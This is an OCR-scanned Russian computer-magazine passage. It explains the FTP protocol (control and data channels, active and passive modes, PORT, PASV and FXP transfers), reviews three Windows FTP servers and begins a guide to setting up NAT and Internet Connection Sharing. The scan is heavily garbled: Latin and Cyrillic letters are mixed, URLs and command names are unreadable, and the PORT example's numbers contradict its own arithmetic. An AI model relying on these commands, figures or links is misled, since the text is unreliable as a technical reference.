Мы прЯМІТГЙТіспользовать РТР-клиенты и серверы, которые име- 
ют арИфический интерфейс, и даже не задумываемся, каким об- 
зом происходит общение между ними? Какие команды нужны 
для элементарных действий по этому протоколу? Да и вообще, 
что собой представляют эти самые элементарные действия? На 
самом деле РТР, несмотря на свою простоту, предоставляет ши- 
рочайшие возможности. Протокол позволяет передавать файлы 
между клиентом и сервером, просматривать содержимое ката- 
логов, переименовывать и удалять файлы и каталоги на сервере. 
Ровно также, как и многие другие привычные для нас протоколы, РТР 
использует для своей работы ТСР-соединение. Однако между ними 
все-таки есть существенное отличие. Вспомни НТТР: этот протокол 
открывает сессию из одного соединения и, выполнив все необходи- 
мые действия, закрывает ее. РТР отличается от других проколов (и от 
НТТР в том числе) тем, что использует не традиционное одно, а сра- 
зу два соединения. Первое — управляющее, оно активно на протя- 
жении всего сеанса связи и предназначено для передачи на сер- 
вер команд и получения его ответов. Другое соединение называет- 
ся каналом данных. Оно устанавливается только тогда, когда необ- 
ходимо передать данные, и закрывается, как только они переданы. 
Иначе говоря, по управляющему (информационному) каналу, ра- 





ботающему в стандарте протокола ТеІпеТ, передают только ко- 
манды. Но они (к примеру, команда на получение файла 570/?), в 
свою очередь, могут инициализировать создание канала, по кото- 
рому будут передаваться непосредственно данные (продолжая 
пример — затребованный файл). Само собой разумеется, что все 
ТСР-соединения и работа с ними скрыты от глаз пользователя. Лю- 
бой РТР-клиент имеет в своем арсенале набор интерактивных ко- 
манд (читай врезку), которые понятны для пользователя. Клиент 
принимает их, преобразует в команды протокола и в таком виде 
передает серверу. 



[как происходит соединение?] Рассмотрим процесс установки 
соединения более подробно. Получив от пользователя команду 
на коннект с сервером, РТР-клиент в первую очередь налаживает 
управляющий канал, то есть устанавливает ТСР-соединение с 21 
портом удаленного компьютера. Сервер в ответ посылает одну 
или несколько строк с приветствием, в котором обычно содер- 
жится описание сервера и информация об его владельце. Для 
продолжения работы пользователю необходимо произвести ав- 
торизацию, то есть передать имя и пароль от учетной записи. Ло- 
гин указывается через пробел после команды ІІ8ЕР. Аналогич- 
ным образом с помощью РА88 передается и пароль. Причем в 
случае анонимного доступа к серверу в качестве имени юзера 
необходимо использовать специальное ключевое слово апопу- 
гтпоиз, а вместо пароля — любой е-таіі. Последнее требование, 
впрочем, уже давно устарело, и сейчас в большинстве случаев в 
качестве пароля для анонимного пользователя можно указать 
все что угодно. 

В случае успешной авторизации сервер отправляет клиенту специ- 
альное сообщение с кодом 230: «ІІзег ІоддесІ іп, ргосеесі». Управля- 
ющее соединение при этом не закрывается, оно остается актив- 
ным и всегда готово для передачи команд на сервер. Как уже было 
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Что такое файловые серверы: шѵѵ.етапиаілі/ 
сді-Ьіп/деі.рІ ?іб=44& ІогтаІ=5Ііо и/ 

Протокол РТР: шшш.етапиаІ.ги/сді-Ып/ 
де!.рІ?ісІ= 1807&1огтаІ=5Ііо\л/ 

РРС959 (РТР): шшшЧацз.огд/іісз/іісЭбЭМтІ 
Пример разработки софта для работы с 
РТР: ѵѵѵѵѵѵ.ѵЫр.сот/РгоіосоШр/ 
ѵЬ-Пр-сІіепі-НЬгагу/беШі.а5р 

Дыры в программах для организации РТР- 
серверов всплывают довольно-таки часто. 

Не брезгуй как можно чаще обновлять ис- 
пользуемый софт, время от времени изу- 
чать логи сервера и следить за свежими 
новостями баг-трака. 




На диске мы любезно выложили все упомя- 
нутые в обзоре программы: Зегѵ-ІТ, бепеб 
РТР Зегѵег, боібеп РТР Зегѵег. 




[описание: Создаем виртуальный каталог в 8егѵ-ІІ] 



сказано, некоторые из них инициализируют открытие еще одного 
соединения для передачи данных. Оно также относится кТСР-типу 
и устанавливается на 20 порту сервера, то есть на единицу мень- 
шем, чем порт управляющего соединения. Номер порта со своей 
стороны клиент выбирает самостоятельно и передает его серверу 
с помощью команды РОИТ. Эта команда имеет шесть параметров в 
виде десятичных чисел, которые разделены между собой запяты- 
ми. Первые четыре числа представляют собой специфическую за- 
пись ІР-адреса, а два последних — номер порта. Это легко пока- 
зать на примере. Так, команда РОИТ 1 92,468,0,2,8,444 ссылается 
на ІР-адрес 192.168.0.2 и порт 5*256+114=1394. Раз клиент форми- 
рует команду самостоятельно, то и ее параметры может указать 
совершенно произвольные, например вместо информации о себе 
подсунуть координаты другого РТР-сервера. Замечу, что это не 
брешь в протоколе, а намеренный шаг. Такой прием очень часто 
используется для организации прямого соединения двух серваков, 
чтобы напрямую по быстрым инет-каналам передавать между ними 
данные. 

Упомянутая мною команда РОРТ характерна для активного режи- 
ма работы с РТР (асИѵе тобе). Логично предположить, что суще- 
ствует еще и пассивный вариант (раззіѵе тобе). Так и есть. В пас- 
сивном режиме клиент локально открывает два так называемых 
непривилегированных порта (N>1024 и N+1). Первый из них, как 
обычно, используется для организации информационного кана- 
ла с 21 портом сервера. Однако после соединения и авториза- 
ции на сервере клиент посылает команду не РОРТ, а РА8Ѵ (пере- 
ход в пассивный режим работы). В результате сервер сам откры- 
вает произвольный порт (Р>1024) и передает информацию о нем 
с помощью команды РОРТ. Клиенту в этом случае остается только 
установить на него ТСР-соединение, со своей стороны используя 
заведомо открытый локальный порт N+1. 

Важно отметить, что канал для передачи данных используется не 
только для транспортировки файлов между клиентом и сервером. 
Помимо этого, по нему также передается содержимое каталогов 
(команда /./57). Впрочем, для многих других команд его инициализа- 
ция не требуется. Так, РТР-клиент вполне может обойтись без него для 
того, чтобы переименовать или удалить файл/каталог, изменить теку- 
щую папку и т.д. 

[команды бывают разные] В протоколе РТР немалое внимание 
уделяется различным способам передачи данных. Клиент с по- 
мощью команды ТУРЕ может указать формат файла и, соответ- 
ственно, указать тип его передачи. В РТР различают три режима 
обмена файлами: ІМАѲЕ (I), АЗСІІ (А) и ЕВСЭІС (Е), причем АЗСІІ 
используется по умолчанию. ІМАОЕ предполагает обмен восьми- 
битными байтами и применяется для передачи двоичных файлов, 
то есть не текстовых. В режимах АЗСІІ (А) и ЕВСЭІС (Е), напротив, 
передается только текстовая информация. На сегодняшний день 
актуальны только АЗСІІ и ІМАѲЕ. Первый, в основном, использует- 
ся для передачи по протоколу РТР различных скриптов и текстовых 
конфигов на веб-сервер, а также для получения содержимого ка- 
талогов. Ітаде, как понимаешь, — для всего остального. 

После соединения с сервером и установки режима работы (ак- 
тивного или пассивного), РТР-клиент переходит в необходимый ка- 
талог удаленной файловой системы. Это осуществляется с по- 
мощью команды СИ/О <путь>. После этого он отсылает команду 
ТУРЕ А, которая активирует текстовый режим для передачи ин- 
формации. Все это необходимо для того, чтобы получить коррект- 
ный список файлов в текущем каталоге. Клиент передает И8Т — и 
готово. Это стандартный сценарий работы практически любого 
РТР-клиента. Выполнив эти базовые действия, он готов принимать 
от пользователя другие команды. 

Для обеспечения лучшего понимания между сервером и клиентом 
в ответ на каждую команду клиента сервер посылает определен- 
ное сообщение. Например после завершения отправки данных 
(закрытия канала данных) он возвращает ответ: «226 СІозіпд баіа 
соппесііоп». Вероятно, ты уже заметил, что ответы сервера начина- 
ются с трехзначного числа. Это сделано намеренно, чтобы их бы- 
ло легко интерпретировать. 

[тест-драйв РТР-сѳрверов под винду] 

ЗЕВѴ-Ц 6.0. 0.2 о 

РАЗМЕР: 3,9 МБ [8 

ЗНАВЕѴУАВЕ § 

ѵѵѵѵѵѵ.ЗЕвѵ-и.сом ь 

Без лишней прелюдии сразу приступим непосредственно к тести- < 

рованию. Первый номинант на сегодня — сервер Зегѵ-ІІ, победи- ^ 
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[КАК РАБОТАЮТ КРОСС-СЕРВЕРНЫЕ КОННЕКТЫ (РХР)?] 

Сразу хочу тебя предупредить, что функция РХР работает далеко не везде и не всегда. Возможность ее примене- 
ния сильно зависит от используемого на сервере софта и его настроек. В любом случае серверы попытаются уста- 
новить соединение между собой и передать файл следующим образом: 

Ш Пользователь соединяется с сервером А и сервером В. Причем серверу А он сразу же посылает команду для пе- 
рехода в пассивный режим (РАЗѴ), на что получает ответ с номером ТСР-порта, на котором тот открыл соединение. 
Ш Юзер передает ІР-адрес сервера А и полученный номер ТСР-порта серверу В, указывая эти параметры в качест- 
ве аргументов команды РОРГГ. 

И Сервер В возвращает пользователю уведомление о том, что все готово к работе. Однако соединение для переда- 
чи данных не устанавливается — в этом пока нет необходимости. 

И Пользователь запрашивает сервер А с помощью команды ЗТОВ передать файл, а сервер В — принять его (ВЕТВ). 
Ш Сервер В подсоединяется к серверу А — устанавливается соединение. 

® Начинается передача файла. 
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[настройка доступа к каталогам сервера — 
занятие увлекательное] 

тель всех мыслимых и немыслимых обзо- 
ров. Любой софт-архив ей дает пять звезд и 
титул «Выбор редакции». Неудивительно. 
Это одна из немногих программ, которую 
можно поставить на виндовый сервер и не 
беспокоиться, что она упадет от внезапно- 
го наплыва пользователей. Я лично исполь- 
зую исключительно ее — два года стабиль- 
ного полета на файловом сервере в до- 
машней локалке практически без нарека- 
ний. Но обо всем по порядку. 

$егѵ-ІІ, как и многие другие программы та- 
кого плана, состоит из двух независимых 
частей: РТР-демона (сервиса) и визуально- 
го административного интерфейса. Пер- 
вая представляет собой непосредственно 
сам РТР-сервер, который принимает клие- 
нтские соединения, обрабатывает и вы- 
полняет их команды. Административный 
интерфейс используется для того, чтобы 
настраивать и управлять сервером. 

Сразу после установки, которая, кстати, не 
вызывает ни малейшей трудности, програм- 
ма пропишет себя в системные сервисы и 
запустит административный интерфейс. 
Причем, чтобы не шокировать пользователя 
обилием всевозможных опций и настроек, 
разработчики предусмотрели специаль- 
ный мастер, который оперативно поможет 
провести первичную настройку и, в част- 
ности, запустить свой первый РТР-сервер. 
Возможно, тебя смутило слово «первый». 
Все дело в том, что с помощью $егѵ-ІІ мож- 
но поддерживать не один, а сразу нес- 
колько серваков. Если ты знаком с леген- 
дарным Апачем, то схема виртуальных 
серверов должна быть тебе знакома. Все 
РТР-серверы физически находятся на од- 
ной машине, но могут быть вызваны по раз- 
ным портам или именам. $егѵ-ІІ их называ- 
ет доменами. Каждый такой домен имеет 
свои собственные параметры, пользова- 
тельские базы и группы, настойки ограни- 
чений по самым разнообразным парамет- 
рам. Другими словами, является полно- 




[параметры 88І_-сертификата. Официальный 
сертификат получить довольно сложно, поэтому 
данные введены от балды] 

ценным РТР-сервером. 

Управление доменами осуществляется 
через удобную древовидную структуру: с 
ее помощью можно одним кликом обра- 
титься к настройкам или логам любого из 
них. Перечислять все доступные опции не 
имеет смысла, особенно если учитывать 
то, что с программой идет отличная доку- 
ментация. Отмечу лишь наиболее инте- 
ресные из них. 

Любому виртуальному серверу можно за- 
дать свой собственный уровень безопас- 
ности. В этом всячески помогает под держка 
$$І_/ТІ_$-шифрования. Долгое время прото- 
кол РТР считался незащищенным, так как в 
общем случае все передаваемые через 
него данные, в том числе логины и пароли, 
могут быть с легкостью перехвачены снифе- 
ром. 128-битное шифрование и 331-серти- 
фикаты, которые использует Зегѵ-ІІ, практи- 
чески исключают подобную ситуацию. При- 
мечательно, что административный интер- 
фейс общается с движком программы (де- 
моном) исключительно по защищенному 
соединению. Это особенно актуально, ес- 
ли учесть, что с помощью оболочки можно 
администрировать не только локальные, но 
еще и удаленные серверы на движке Зегѵ-ІІ. 
Другой интересной особенностью прог- 
раммы является поддержка виртуальных 
папок. Предположим, что каталог СЛРТР- 
РІІВ является домашней директорией для 
какой-то определенной группы пользова- 
телей. Задача такова: переместить в нее 
несколько десятков гигабайт информации 
из папки С; \ /Л/ГО. Решений, естественно, 
может быть несколько. Кто-то, возможно, 
не задумываясь скопирует столь дикие 
объемы в нужную папку и заодно занесет в 
повестку дня пункт о покупке дополнитель- 
ного винта. Но это далеко не самый луч- 
ший вариант. Ясно, что лучше вообще 
обойтись без копирования данных, а это 
возможно только при помощи виртуальной 




[общие параметры домена: поддержка 
защищенных соединений почему-то отключена] 



папки. Для ее создания необходимо ука- 
зать, где физически хранится требуемая 
информация (С: \ /Л/ГО), затем имя вирту- 
альной папки (/Л/ГО) и, в конце концов, ди- 
ректорию, в которой она будет отобра- 
жаться на РТР-сервере ( СЛ/ТРРЕ/Б ). Если 
все сделано правильно, то в корневой ди- 
ректории пользователей появится папка 
/Л/ГО с данным, которые физически по- 
прежнему находятся совершенно в дру- 
гом месте. 

Как и полагается софтине такого рода, 
Зегѵ-ІІ имеет разветвленную систему са- 
мых разнообразных квот и разрешений. 
Для каждого пользователя, к примеру, 
можно установить специальное ограниче- 
ние «п залил — т можешь скачать» (ска- 
жем, 3 к 1). При этом предусмотрена воз- 
можность указывать файлы для бесплатно- 
го скачивания, которые под это ограниче- 
ние не попадают. 

Вердикт: великолепная программа, кото- 
рая, плюс ко всему, прочему выдержала 
испытания на прочность. Даже если к 
серверу подключаются сразу несколько 
десятков клиентов и начинают качать 
файлы, ничего страшного не происходит. 
Сказать честно, Зегѵ-ІІ выдерживала и не 
такое. Помимо устойчивой работы, стоит 
отметить возможность интеграции с 
Асііѵе Эігесіогу и компрессии данных, 
что наверняка понравится многим адми- 
нистраторам. Единственное нарекание: 
пару раз в программе находили крити- 
ческие ошибки, а на зесигііу-сайтах появ- 
лялись публичные эксплоиты. Что я могу 
сказать? С кем не бывает... 



0ЕЙЕ6 РТР 8ЕВѴЕВ 

РАЗМЕР: 3,5 МБ 

ЗНАВЕѴѴАВЕ 

ѴѴѴѴѴѴ.66РТРЗЕВѴЕВ.С0М 

Признаться честно, я долгое время исполь- 
зовал Зегѵ-ІІ и свято верил, что софтина явля- 
ется лучшей в своем роде. И только сейчас 





[ОСНОВНЫЕ РТР- КОМАНДЫ] 

Ситуации, когда возможность воспользоваться графи- 
ческим РТР-клиентом отсутствует, встречаются 
сплошь и рядом. Когда, наконец, с ней столкнешься, 
ты будешь неприятно удивлен, что работа со станда- 
ртным консольным клиентом Кр (он есть как в ѵѵіп- 
сіоѵѵз, так и в *піх-ЬазесІ системах) невозможна без 
знания элементарных РТР-команд. 

Советую познакомиться с ними сейчас — потом может 
быть поздно. 

ореп имя_сервера — коннект к серверу, 
ссі имя_директории — сменить каталог. 



сііг — выдать список файлов. 

деі имя_файла [имя_локального_файла] — скачать 

файл. 

риі имя_файла [имя_удаленного_файла] — залить 
файл на сервер. 

азсіі — устанавливает азсіі-способ передачи файлов. 
Используется для пересылки текстовых файлов. 
Ьіпагу — устанавливает двоичный способ пересылки 
файлов. 

Неір — справка. 

сіозе — закрыть соединение с сервером, 
диіі — выход из РТР-клиента. 



я начинаю понимать, что я был неправ. Ока- 
залось, что у нее есть реальный конкурент, 
который обладает если уж и не большими, 
то точно не меньшими возможностями. Поз- 
воль представить: Гена (Ѳепеб РТР Зегѵег). 
Первое, что приходит на ум после запуска 
программы: «Где-то я это уже видел!». 
Внешне Ѳепеб очень похож на предыду- 
щую программу из обзора: слева пример- 
ное такое же древовидное меню, справа 
— настройки. После более детального 
изучения становится ясно, что сходства 
присутствуют не только во внешнем виде. 
Сама система работы программы очень 
похожа на Зегѵ-ІІ: открываем домен, уста- 
навливаем его на удобный порт, добавляем 
пользователей — и вперед. Разработчики 
гордо утверждают, что их программа самая 
стойкая и защищенная. И, знаешь ли, что-то 
в этом действительно есть. Уже на протяже- 
нии долгого времени в программе практи- 
чески не находят критических ошибок. Да и 
среди малочисленных брешей едва ли най- 
дется хоть одна, которая реально могла бы 
навредить серверу. Стоит отметить, что раз- 
работчики в свое время сосредоточили все 
внимание на поддержке защищенного сое- 
динения, и поэтому 331-шифрование реали- 
зовано на самом высоком уровне. 
Добротно выполнена система управления 
пользователями. Для каждого из них можно 
настроить все и вся, включая даже самые 
маленькие мелочи. И если ограничениями 
по трафику и по используемой скорости 
сейчас никого не удивишь, то поддержка 
доступа по расписанию есть далеко не на 
каждом сервере. Кроме того, меня особен- 
но порадовала функция создания времен- 
ных учетных записей, период существова- 
ния которых ограничен. Каждой группе, ров- 
но так же, как и пользователю, админ вправе 
задать маски файлов, на работу с которыми 
они имеют разрешение. По сути, это альтер- 
нативный способ организации иерархии 
пользователей с различным уровнем досту- 
па к хранимой на сервере информации. 
Можно сделать так, что новичкам будут дос- 
тупны только электронные книги (пусть прос- 
вещаются), юзерам постарше — еще и му- 
зыка (чтобы веселее работать было), а ста- 
рички в сети имели бы полноценный доступ 
ко всем типам файлов (они уже свое отрабо- 
тали, а теперь могут отдохнуть). 

Как и Зегѵ-ІІ, Ѳепеб умеет создавать вирту- 
альные папки и работать с ними. Причем 
можно эмулировать присутствие на сер- 
вере даже тех файлов, которые хранятся 
на удаленном компьютере в сети или во- 
обще на других РТР'шниках. Впрочем, это 
еще цветочки. 

Самый смак программы, на мой взгляд, зак- 




[управление РТР-сервером через веб-интерфейс: 
настраиваем политику безопасности] 

лючается в поддержке собственных сцена- 
риев: написал скрипты на все случаи жизни 
и спи спокойно. В Ѳепеб заложено нес- 
колько десятков встроенных событий, нап- 
ример она умеет реагировать на получе- 
ние файла. Новоприбывшее барахло мож- 
но на месте проверить на вирусы, а затем 
автоматически рассортировать по нужным 
каталогам (*.трЗ в музыку, *.аѵі в видео и 
т.д.). Здесь все ограничивается исключи- 
тельно твоей фантазией и знанием языка 
ѴВ-скрипт. Хотя многое за тебя уже давно 
сделали, и в Сети доступна масса допол- 
нительных плагинов. Проштудируй ѵѵѵѵѵѵ./Ьх- 
іТо.сот/5сгірТ5/іпсІех.рІір?рсіде=рго- 
сІисШ.рІір&ТсіЫе=Ьр11-рЗ и ѵѵѵѵѵѵ.дбЯрзегѵ- 
ег.сот/1 : огипп/іпсІех.рІір?зІіо\л/іоріс=498. 
Вердикт: безусловно, одна из лучших прог- 
рамм для поднятия РТР-сервера. По неко- 
торым параметрам превосходит леген- 
дарный Зегѵ-ІІ и предоставляет уникаль- 
ные возможности по организации полной 
автоматики на основе скриптов. Плюс ко 
всему, сервером можно управлять уда- 
ленно через \л/еЬ-интерфейс, поэтому лю- 
бая возникшая проблема решается дис- 
танционно. Куча плагинов наверняка сос- 
лужит тебе хорошую дружбу, а поддержка 
компрессии на лету позволит добиться 
увеличения скорости передачи данных. 
Единственная проблема, с которой могут 
столкнуться владельцы крупных серве- 
ров, — программа не по-детски грузит 
систему. Иначе говоря, очень требова- 
тельна к ресурсам. 

ВОЮЕМ РТР ЗЕВѴЕВ 2.16 РВО 

РАЗМЕР: 900 КБ 

ЗНАВЕѴУАВЕ 

ѴѴѴѴѴѴ.66РТРЗЕВѴЕВ.С0М 

Это программа попала в обзор по одной 
причине — она проще некуда. Я отлично 
понимаю, что далеко не всем хочется па- 
рить себе мозги и долгими вечерами пи- 
сать скрипты, осваивая Ѳепеб РТР Зегѵег. 
Частенько случаются ситуации, когда тре- 
буется срочно поднять РТР-сервак и при 
этом не вникать во все подробности его 




[процесс соединения с локальным сервером] 



работы. Ѳоісіеп РТР Зегѵег для таких случа- 
ев — идеальный вариант. 

Из всех прог, что я видел, у этой — самый ма- 
ленький набор настроек. При этом она не по- 
хожа на какой-то полуфабрикат. Напротив, это 
вполне законченный продукт, но для новичков. 
Просто укажи ей папки, которые будут доступ- 
ны на РТР, и пользователей, которые эти папки 
увидят, — и на этом настройка закончится. 
Собственно говоря, а что еще надо? 

Забанить недруга? Не вопрос, просто вне- 
си его в бан-лист, и дело в шляпе. Ах, ты хо- 
чешь полностью запретить анонимный 
доступ? И это ерунда — все решается в 
два клика мыши. Не подумай, что програм- 
ма совсем голая — она все-таки имеет па- 
ру-тройку полезных функций. 

Вердикт: самый простой, но вместе с тем 
вполне стабильный РТР-сервер. Настроить 
его сможет даже первоклассник, зато эле- 
ментарные функции он выполняет ничуть не 
хуже его старших братьев по конвейеру. 
Если времени на поднятие сервера нет, но 




[баним юзера на РТР-сервере] 




[Ѳоісіеп РТР Рго: все просто, как две копейки] 
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Шлюз в инет 

ШИРОКОПОЛОСНЫЙ ДОСТУП В ИНТЕРНЕТ 
СТРЕМИТЕЛЬНО ДЕШЕВЕЕТ. ВСЕ ЧАЩЕ И ЧА- 
ЩЕ ЛЮДИ СПРАШИВАЮТ МЕНЯ: «КАК СДЕ- 
ЛАТЬ ТАК, ЧТОБЫ НЕСКОЛЬКО КОМПЬЮТЕ- 
РОВ В ЛОКАЛКЕ МОГЛИ РАБОТАТЬ В ИНЕТЕ 
ЧЕРЕЗ ОДНО ПОДКЛЮЧЕНИЕ?». РЕШИТЬ ЭТУ 
ПРОБЛЕМУ ЧРЕЗВЫЧАЙНО ПРОСТО, НЕ 
ОБЛАДАЯ ПРИ ЭТОМ ГЛУБОКИМИ ПОЗНА- 
НИЯМИ В АДМИНИСТРИРОВАНИИ. ДАЖЕ В 
ѴѴІШОѴѴЗ ХР ИМЕЮТСЯ ВСЕ НЕОБХОДИМЫЕ 
СРЕДСТВА ДЛЯ ОРГАНИЗАЦИИ ШЛЮЗА 
МЕЖДУ ВНУТРЕННЕЙ И ВНЕШНЕЙ ГЛОБАЛЬ- 
НОЙ СЕТЬЮ I Степан Ильин ака ЗТер (зТер@геаІ. хакер. ш) 

Организуем в локалке 
совместный интернет- 
канал с системой 
учета трафика 

[в чем сила, ІЧАТ?] Для полноценного ре- 
шения этой задачи придется воспользо- 
ваться технологией МАТ, или, иначе гово- 
ря, трансляцией сетевых адресов 
(Ыеілл/огк Асісігезз ТгапзІаНоп). Ее, в частно- 



сти, должен поддерживать маршрутиза- 
тор, который обеспечивает связь между 
внутренней сетью и интернетом. Под 
маршрутизатором в нашем случае пони- 
мается компьютер, специальным обра- 
зом настроенный для передачи ІР-пакетов 
в нужном направлении. Это направление 
определяется исходя из специальных 
правил, которые записаны в таблицу 
маршрутизации (получить текущую табли- 
цу можно командой гоиіе /ргіпТ). Принято 
выделять статические и динамические 
правила. Первые жестко зафиксированы 
и могут быть внесены, изменены или уда- 
лены только администратором. Динами- 
ческие, в свою очередь, вносятся в табли- 
цу маршрутизации автоматически, ис- 
пользуя данные, полученные от других 
маршрутизаторов. 

Каждый компьютер локальной сети для 
полноценного обмена пакетами должен 




[общая схема МАТ: все пакеты от клиентов 
(10.0.0.2-10.0.0.254), проходя І\ІАТ, получают в по- 
ле ЗРС ІР внешний адрес маршрутизатора] 




иметь свой уникальный ІР-адрес. С другой стороны, во внешней 
сети (инете) любой узел также имеет его. Каким же образом избе- 
гается путаница? Для этого специальным стандартом РРС были 
определены адреса блоков, которые применяются исключитель- 
но в локальных сетях. Ими стали диапазоны 10.0.0.0-10.255.255.255, 
172.16.0.0 - 172.16.255.255, 192.168.0.0 - 192.168.255.255. Стандарт 
гарантировал, что они никогда не будут применяться во внешних 
сетях. И не обманул. Пакеты с такими адресами попросту не 
маршрутизируются в интернет, но это отнюдь не значит, что связь 
машины из локалки и сервера в интернете невозможна. Был раз- 
работан специальный механизм, который передает пакеты уз- 
лам во внешнюю сеть, получает от них ответы, после чего доста- 
вляет их обратно компьютерам внутри локалки. Как ты уже понял, 
это ЫАТ. 

Для организации коллективного подключения к инету необходим, 
по меньшей мере, один ІР-адрес из внешней сети — его предо- 
ставляет провайдер. Сетевой интерфейс с внешним ІР устанавли- 
вается в маршрутизатор, туда же ставится еще одна сетевуха для 
доступа в локальную сеть. Чтобы понять технологию МАТ, рассмо- 
трим ее работу на примере. 

Начну с того, что любой ІР-пакет состоит из заголовка и поля дан- 
ных. Два основных поля заголовка: адрес отправителя (ЗРС ІР) и 
адрес получателя (ЭЗТ ІР). Допустим, клиент из локальной сети 
(адрес записывается в ЗСР ІР) посылает пакет узлу с адресом 
зегѵег.ги (ЭЗТ ІР). Когда пакет прибывает на маршрутизатор, тот 
модифицирует заголовок специальным образом. В качестве ад- 
реса отправителя указывается ІР-адрес маршрутизатора во вне- 
шней сети, что обеспечивает возможность получения ответа. При 
этом все изначальные параметры пакета записываются в ЫАТ-та- 
блице. Теперь, когда от сервера зегѵег.ги придет ответный пакет, 
маршрутизатор сможет произвести обратную замену и доста- 
вить его клиентскому компьютеру. 





Для организации оплаты 
карточки необходимо 
установить специальный 
плагин, доступный на сайте 
разработчиков. Там же 
доступны и другие 
дополнения 




Если у тебя не работает 
встроенный веб-сервер, 
попробуй обновить 
ѴѴіпбот Зсгірі до версии 
5.6 (ѵѵѵѵѵѵ.зтагі- 
зоП.гиШйІез/зсгірІги.ехе). 
Скорее всего, проблема 
именно в нем 



Удивительно, но многие почему-то путают МАТ и прокси-сервер. В 
действительности же это совершенно разные вещи. ЫАТ остает- 
ся скрытым как для отправителя, так и для получателя и не вносит 
в работу клиента каких-либо ограничений. Тот может серфить 
веб-сайты, работать на шелле, РТР или, наконец, играть в игры - 
ничего не надо настраивать, все выглядит так, как будто он сам 
находится во внешней сети. Прокси-сервер, напротив, не являет- 
ся прозрачным. Для его использования необходимо указывать 
ряд настроек, причем для каждого приложения отдельно. Вдоба- 
вок, далеко не каждая программа (в особенности игры) поддер- 
живает работу через прокси/зоскз, и в этом плане такая органи- 
зация коллективного доступа в сеть сильно проигрывает ЫАТ'у. 



[настройка ЫАТ] Надеюсь, ты понял, что в нашем нелегком деле 
едва ли можно обойтись без организации МАТ'а. К счастью, его 
поддерживают Ргоіюззіопаі версии как \Л/іпсІо\л/5 ХР, так и 2000 - 
хотя бы с этим проблем возникнуть не должно. Программисты 
Мі егозой, разрабатывая ось для рабочих станций, на славу по- 
старались, чтобы наладить работу МАТ'а было максимально 
просто. Коллективный доступ в инет настраивается с помощью 
специальной службы Іпіегпеі Соппесііоп ЗОагіпд (ІСЗ), удиви- 
тельной по простоте, но вместе с тем предоставляющей широ- 
кие возможности. Во-первых, ІСЗ — это прозрачный узел между 




Обязательно к прочтению: 
шшш.озюпе.пеі/шіпбо і/з/шіп 
хр/44.зЫт — как работает 
механизм І\ІАТ. 
ѵѵшш.зтагі- 
зоЙ.ш/?раде=Ибос — 
примеры настройки ТгаШ 
ІпзресіоТа под различные 




На диске ты найдешь 
полную версию ТгаШ 
Іпзресіог, все необходимые 
файлы для ее установки, а 
также дополнительные 
утилиты 



нужды. 

шшш.зтагі-зоП.гиЛогит — 
форум программы. Здесь 
ты получишь ответ на 
любой вопрос. 

/ огит.пад.ги — отличный 
форум по 

администрированию в 
целом. 



внутренней и внешней сетями 
на основе сразу трех техноло- 
гий: МАТ, ЭМЗ (Оотаіп Мате Зу- 
зіет) и ОНСР (Оупатіс Нозі 
СопйдигаТіоп РгоіосоІ). Иначе 
говоря, сборная солянка тех- 
нологий в легко конфигурируе- 
мой оболочке. Опытные адми- 
ны, конечно, выскажут свое 
«фи» на тему того, что ІСЗ — это 
удел ламеров. Но мы же не беремся за создания роутера для 
корпоративной сети, верно? 

Так что отбросим все предрассудки и займемся непосред- 
ственной настройкой роутера. Начать стоит с соединения, кото- 
рое смотрит в интернет. Для этого заходи в его свойства и изучай 
вкладку «Общие». Здесь находится список компонентов (прото- 
колы, службы и т.д.), которые установлены для данного соедине- 
ния. Чтобы облегчить себе последующую настройку, обязатель- 
но отключи клиента для сетей МісгозоІТ и службу доступа к фай- 
лам и принтерам сетей Мі егозой. Для внешнего канала они на- 
фиг не нужны! Сделал? Точно сделал? :) Тогда переходи во 
вкладку «Дополнительно». Отсюда осуществляется управление 
общим доступом к соединению. Вся настройка, в принципе, сво- 
дится к установке галочки напротив соответствующей опции, ко- 
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[настройка внешнего сетевого ин- 
терфейса] 



[вот она, заветная опция! Не забудь 
указать имя внутреннего подключения] 



торая имеет громоздкое название. Приводить его здесь не буду 
— уверен, что ты не промахнешься. К сожалению, каких-либо на- 
строек по дифференцированию доступа, назначению прав 
пользователям и тому подобному здесь нет. Как и в принципе в 
винде. Все эти задачи полностью возложены на сторонний софт, 
речь о котором пойдет ниже. Единственная доступная опция — 
«Разрешить другим пользователям сети управлять общим досту- 
пом к подключению в интернет». Рекомендую ее отключить. В 
противном случае пользователи много не натворят, но отключить 
соединение, к примеру, вполне могут. Если у тебя ѴѴіпсІо\л/5 ХР с 
установленным ЗР2, то на этой же вкладке доступны опции встро- 
енного файрвола. Хорошо бы его полностью деактивировать, 
благо, все его функции с не меньшим успехом будет выполнять 
нижеописанный софт для учета трафика. 

После настройки внешнего соединения, скорее всего, произой- 
дут метаморфозы в конфигурации сетевухи, работающей во вну- 
тренней локальной сети. Іпіегпеі Соппесііоп ЗПагіпд является 
большим фанатом автоматической выдачи клиентам ІР-адресов, 
а посему обязательно включит свой ЭНСР-сервер (подробнее о 
нем читай во врезке). Если тебя такое положение дел не устраи- 
вает, что вполне вероятно для небольших локалок, то его не со- 
ставит труда отключить. Для этого заходи в настройки внутренне- 
го соединения в конфиги протокола ТРС/ІР (вкладка «Общие»). 
Указывай здесь статический ІР-адрес — 192.0.0.1, например, ма- 



[ОУМАМІС НОЗТ СОЫРІОІІВАТІОМ РВОТОСОЬ] 

ОИСР (Оупатіс Нозі Сопіідигаііоп РгоіосоІ) — протокол 
автоматического распределения ІР-адресов и других 
сетевых настроек между компьютерами локальной се- 
ти. В случае наличия в локалке ОНСР-сервера вся ин- 
формация о диапазонах ІР’шников, масках подсети, 
шлюзах и ОІ\ІЗ-серверах централизованно хранится в 
его базе данных. Любой компьютер, который хочет 
войти в сеть, в первую очередь обращается именно к 
нему, где автоматически получает ІР-адрес и прочие 
сетевые настройки. В больших корпоративных локал- 
ках это чуть ли не единственный способ сохранить сон 
администраторам. Объясняю почему. Раз настроив 
ОНСР-сервер, админ освобождает себя от изнуритель- 
ной настройки каждого компьютера в отдельности. 

Ему не надо больше вручную выделять и указывать 
ІР’шники, маску подсети и 0143-серверы — все это ра- 
бочая станция получает автоматически. Исключение 
составляют компьютеры с установленными сетевыми 
сервисами и принтерами, которым, естественно, нуж- 
но задать статические ІР-адреса. 

Используя ОНСР-сервер, админ должен постоянно за- 
ботиться об архивации базы сервера. Ведь с выходом 
его из строя упадет и вся локалка. Естественно, не 
сразу, а лишь после истечения так называемого срока 
аренды. Последний является очень важной компонен- 
той всей ОНСР-системы: это промежуток времени, в 
течение которого компы сохраняют свой ІР-адрес без 
